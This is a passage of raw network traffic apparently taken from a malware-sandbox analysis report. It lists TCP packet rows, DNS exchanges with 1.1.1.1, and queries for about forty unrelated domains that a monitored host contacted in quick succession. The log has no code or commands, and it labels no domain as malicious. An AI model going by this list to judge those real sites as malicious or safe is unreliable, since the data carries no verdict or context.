                                                              Sep 9, 2024 12:07:46.346051931 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:46.346062899 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:46.346286058 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:46.347465038 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:46.392496109 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:47.699996948 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:47.700021982 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:47.700037003 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:47.700114012 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:47.700141907 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:47.700292110 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:47.700341940 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:47.736845970 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:47.736886024 CEST44349771109.237.132.56192.168.2.4
                                                              Sep 9, 2024 12:07:47.736974955 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:47.737328053 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:47.737343073 CEST44349771109.237.132.56192.168.2.4
                                                              Sep 9, 2024 12:07:49.020298004 CEST44349771109.237.132.56192.168.2.4
                                                              Sep 9, 2024 12:07:49.020395041 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:49.022325039 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:49.022335052 CEST44349771109.237.132.56192.168.2.4
                                                              Sep 9, 2024 12:07:49.022586107 CEST44349771109.237.132.56192.168.2.4
                                                              Sep 9, 2024 12:07:49.024542093 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:49.024564028 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:49.024570942 CEST44349771109.237.132.56192.168.2.4
                                                              Sep 9, 2024 12:07:51.061503887 CEST44349771109.237.132.56192.168.2.4
                                                              Sep 9, 2024 12:07:51.061764002 CEST49771443192.168.2.4109.237.132.56
                                                              Sep 9, 2024 12:07:51.410518885 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:51.410556078 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:51.410619020 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:51.410986900 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:51.411001921 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:52.274244070 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:52.274431944 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:52.275965929 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:52.275980949 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:52.276222944 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:52.277399063 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:52.277426004 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:52.277435064 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:53.642879009 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:53.642947912 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:53.643022060 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:53.643125057 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:53.643141985 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:53.643152952 CEST49772443192.168.2.480.158.2.41
                                                              Sep 9, 2024 12:07:53.643160105 CEST4434977280.158.2.41192.168.2.4
                                                              Sep 9, 2024 12:07:53.723886013 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:53.723933935 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:53.724001884 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:53.724780083 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:53.724792957 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:54.548713923 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:54.548835993 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:54.550554037 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:54.550564051 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:54.550765038 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:54.552145004 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:54.552165031 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:54.552170038 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:55.271290064 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:55.271317005 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:55.271332026 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:55.271562099 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:55.271579981 CEST4434977335.214.211.239192.168.2.4
                                                              Sep 9, 2024 12:07:55.271661043 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:55.271922112 CEST49773443192.168.2.435.214.211.239
                                                              Sep 9, 2024 12:07:55.736387968 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:55.736418962 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:55.736495972 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:55.736841917 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:55.736855984 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.570482969 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.570636034 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:56.572460890 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:56.572473049 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.572731018 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.573946953 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:56.573966980 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:56.573972940 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.887017965 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.887068033 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.887257099 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:56.887412071 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:56.887423992 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:56.887437105 CEST49774443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:56.887442112 CEST44349774185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:57.594541073 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:57.594580889 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:57.594737053 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:57.594990015 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:57.595004082 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:58.257404089 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:58.257522106 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:58.258755922 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:58.258766890 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:58.258976936 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:58.260019064 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:58.304508924 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:59.100440025 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:59.100464106 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:59.100477934 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:59.100567102 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:59.100596905 CEST44349775185.15.78.186192.168.2.4
                                                              Sep 9, 2024 12:07:59.100645065 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:59.100961924 CEST49775443192.168.2.4185.15.78.186
                                                              Sep 9, 2024 12:07:59.149506092 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.149545908 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.149635077 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.149883032 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.149898052 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.628848076 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.628905058 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.630228996 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.630239964 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.630450010 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.631414890 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.631431103 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.631438017 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.775320053 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.775363922 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.775434971 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.775590897 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.775590897 CEST49776443192.168.2.4198.185.159.145
                                                              Sep 9, 2024 12:07:59.775614977 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.775623083 CEST44349776198.185.159.145192.168.2.4
                                                              Sep 9, 2024 12:07:59.819214106 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:07:59.819241047 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:07:59.819319963 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:07:59.819582939 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:07:59.819598913 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.292571068 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.292726040 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.294054985 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.294064045 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.294265985 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.295284986 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.336508036 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.434937000 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.434979916 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.435029984 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.435044050 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.435148954 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.435173988 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.435184956 CEST44349777198.185.159.144192.168.2.4
                                                              Sep 9, 2024 12:08:00.435194016 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.435225010 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.435267925 CEST49777443192.168.2.4198.185.159.144
                                                              Sep 9, 2024 12:08:00.687060118 CEST49778443192.168.2.495.215.226.251
                                                              Sep 9, 2024 12:08:00.687094927 CEST4434977895.215.226.251192.168.2.4
                                                              Sep 9, 2024 12:08:00.687181950 CEST49778443192.168.2.495.215.226.251
                                                              Sep 9, 2024 12:08:00.687508106 CEST49778443192.168.2.495.215.226.251
                                                              Sep 9, 2024 12:08:00.687520027 CEST4434977895.215.226.251192.168.2.4
                                                              Sep 9, 2024 12:08:01.422700882 CEST4434977895.215.226.251192.168.2.4
                                                              Sep 9, 2024 12:08:01.422797918 CEST49778443192.168.2.495.215.226.251
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 9, 2024 12:07:03.696229935 CEST6256653192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:03.716538906 CEST53625661.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:05.227942944 CEST6334253192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:05.237983942 CEST53633421.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:05.239343882 CEST5922153192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:05.270159960 CEST53592211.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:05.271363020 CEST5148253192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:05.281063080 CEST53514821.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:05.282861948 CEST6365653192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:05.295304060 CEST53636561.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:07.070254087 CEST6015553192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:07.082232952 CEST53601551.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:07.084769011 CEST5696253192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:07.457977057 CEST53569621.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:08.155585051 CEST5880053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:08.323786974 CEST53588001.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:09.873889923 CEST4973853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:09.911330938 CEST53497381.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:11.852992058 CEST5362853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:11.901187897 CEST53536281.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:11.903928995 CEST4924353192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:12.064980984 CEST53492431.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:12.068695068 CEST5246953192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:12.102761030 CEST53524691.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:13.571923018 CEST5475853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:13.615361929 CEST53547581.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:14.888868093 CEST5525653192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:14.922874928 CEST53552561.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:16.329658985 CEST5410153192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:16.556098938 CEST53541011.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:17.316670895 CEST6097053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:17.329066992 CEST53609701.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:18.451149940 CEST5037253192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:18.487750053 CEST53503721.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:19.296350956 CEST5122853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:19.333359003 CEST53512281.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:19.958678961 CEST6461553192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:19.973772049 CEST53646151.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:20.948771954 CEST4968153192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:21.000067949 CEST53496811.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:21.992017031 CEST6388153192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:22.216485977 CEST53638811.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:23.417171955 CEST6351053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:23.446269035 CEST53635101.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:24.417653084 CEST5147653192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:24.430177927 CEST53514761.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:25.155900955 CEST4944553192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:25.205933094 CEST53494451.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:27.243017912 CEST5269053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:27.253137112 CEST53526901.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:27.686656952 CEST5803553192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:28.496293068 CEST53580351.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:28.499510050 CEST5657453192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:28.515229940 CEST53565741.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:29.128794909 CEST6470753192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:29.145878077 CEST53647071.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:30.577294111 CEST5715753192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:30.607311964 CEST53571571.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:30.608632088 CEST6266953192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:31.017535925 CEST53626691.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:31.645611048 CEST6463053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:31.874669075 CEST53646301.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:33.041030884 CEST4940853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:33.077308893 CEST53494081.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:34.381134033 CEST5463453192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:34.392524004 CEST53546341.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:34.395190954 CEST5132953192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:34.467374086 CEST53513291.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:36.527848959 CEST6095053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:36.541937113 CEST53609501.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:37.396486044 CEST5927953192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:37.420089960 CEST53592791.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:38.671502113 CEST5246653192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:38.773215055 CEST53524661.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:39.891870975 CEST5263053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:40.020602942 CEST53526301.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:41.781543016 CEST6089153192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:41.803149939 CEST53608911.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:42.446377039 CEST5305753192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:42.483187914 CEST53530571.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:43.351290941 CEST5345153192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:43.396322012 CEST53534511.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:43.678716898 CEST5635653192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:43.747555971 CEST53563561.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:44.813524961 CEST6468853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:45.541176081 CEST53646881.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:47.703432083 CEST5539553192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:47.736159086 CEST53553951.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:51.064898014 CEST6055053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:51.409773111 CEST53605501.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:53.644925117 CEST6034853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:53.654057026 CEST53603481.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:53.655821085 CEST6240753192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:53.722963095 CEST53624071.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:55.275046110 CEST5797453192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:55.486047983 CEST53579741.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:55.569734097 CEST5548753192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:55.579142094 CEST53554871.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:55.581552982 CEST6281153192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:55.735584021 CEST53628111.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:56.888679981 CEST6394853192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:57.593336105 CEST53639481.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:59.103034019 CEST4938353192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:59.148766041 CEST53493831.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:07:59.776489973 CEST6312953192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:07:59.818485022 CEST53631291.1.1.1192.168.2.4
                                                              Sep 9, 2024 12:08:00.438028097 CEST5347053192.168.2.41.1.1.1
                                                              Sep 9, 2024 12:08:00.686120987 CEST53534701.1.1.1192.168.2.4
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 9, 2024 12:07:03.696229935 CEST192.168.2.41.1.1.10x84f1Standard query (0)parksideseniorliving.netA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.227942944 CEST192.168.2.41.1.1.10xfc6aStandard query (0)90nguyentuan.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.239343882 CEST192.168.2.41.1.1.10x197cStandard query (0)enactusnhlstenden.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.271363020 CEST192.168.2.41.1.1.10xe2fdStandard query (0)avisioninthedesert.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.282861948 CEST192.168.2.41.1.1.10x3318Standard query (0)lashandbrowenvy.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:07.070254087 CEST192.168.2.41.1.1.10xf6f3Standard query (0)satoblog.orgA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:07.084769011 CEST192.168.2.41.1.1.10xef83Standard query (0)rsidesigns.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:08.155585051 CEST192.168.2.41.1.1.10x5e9cStandard query (0)pansionatblago.ruA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:09.873889923 CEST192.168.2.41.1.1.10xb468Standard query (0)magrinya.netA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:11.852992058 CEST192.168.2.41.1.1.10x2d44Standard query (0)baikalflot.ruA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:11.903928995 CEST192.168.2.41.1.1.10x3c81Standard query (0)bd2fly.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:12.068695068 CEST192.168.2.41.1.1.10xa32fStandard query (0)business-basic.deA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:13.571923018 CEST192.168.2.41.1.1.10xfcecStandard query (0)afbudsrejserallinclusive.dkA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:14.888868093 CEST192.168.2.41.1.1.10x1b57Standard query (0)m2graph.frA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:16.329658985 CEST192.168.2.41.1.1.10x13a4Standard query (0)stanleyqualitysystems.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:17.316670895 CEST192.168.2.41.1.1.10x9a57Standard query (0)karnesstanleyhvac.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:18.451149940 CEST192.168.2.41.1.1.10xf646Standard query (0)altitudeboise.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.296350956 CEST192.168.2.41.1.1.10xe846Standard query (0)altitudetrampolinepark.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.958678961 CEST192.168.2.41.1.1.10x5ffbStandard query (0)www.altitudetrampolinepark.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:20.948771954 CEST192.168.2.41.1.1.10x7aafStandard query (0)lexced.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:21.992017031 CEST192.168.2.41.1.1.10xa8e4Standard query (0)www.lexced.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:23.417171955 CEST192.168.2.41.1.1.10x43c9Standard query (0)chainofhopeeurope.euA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:24.417653084 CEST192.168.2.41.1.1.10x6222Standard query (0)bayshoreelite.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:25.155900955 CEST192.168.2.41.1.1.10xace6Standard query (0)mursall.deA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:27.243017912 CEST192.168.2.41.1.1.10xb1daStandard query (0)amelielecompte.wordpress.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:27.686656952 CEST192.168.2.41.1.1.10xf20eStandard query (0)wribrazil.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:28.499510050 CEST192.168.2.41.1.1.10xc004Standard query (0)testitjavertailut.netA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:29.128794909 CEST192.168.2.41.1.1.10xb973Standard query (0)princebet88.siteA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:30.577294111 CEST192.168.2.41.1.1.10x7cd3Standard query (0)chomiksy.netA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:30.608632088 CEST192.168.2.41.1.1.10x3525Standard query (0)vitoriaecoturismo.com.brA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:31.645611048 CEST192.168.2.41.1.1.10x6aaStandard query (0)georgemuncey.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:33.041030884 CEST192.168.2.41.1.1.10x6c33Standard query (0)www.georgemuncey.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:34.381134033 CEST192.168.2.41.1.1.10x52feStandard query (0)funworx.deA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:34.395190954 CEST192.168.2.41.1.1.10xbc3Standard query (0)nbva.co.ukA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:36.527848959 CEST192.168.2.41.1.1.10x2968Standard query (0)c-sprop.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:37.396486044 CEST192.168.2.41.1.1.10x365aStandard query (0)relevantonline.euA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:38.671502113 CEST192.168.2.41.1.1.10x1865Standard query (0)abulanov.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:39.891870975 CEST192.168.2.41.1.1.10x1c86Standard query (0)maxcube24.com.uaA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:41.781543016 CEST192.168.2.41.1.1.10xf8b4Standard query (0)kenmccallum.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:42.446377039 CEST192.168.2.41.1.1.10xd66eStandard query (0)stage-infirmier.frA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:43.351290941 CEST192.168.2.41.1.1.10x3cb3Standard query (0)skoczynski.euA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:43.678716898 CEST192.168.2.41.1.1.10x6b4fStandard query (0)mieleshopping.itA (IP address)IN (0x0001)false
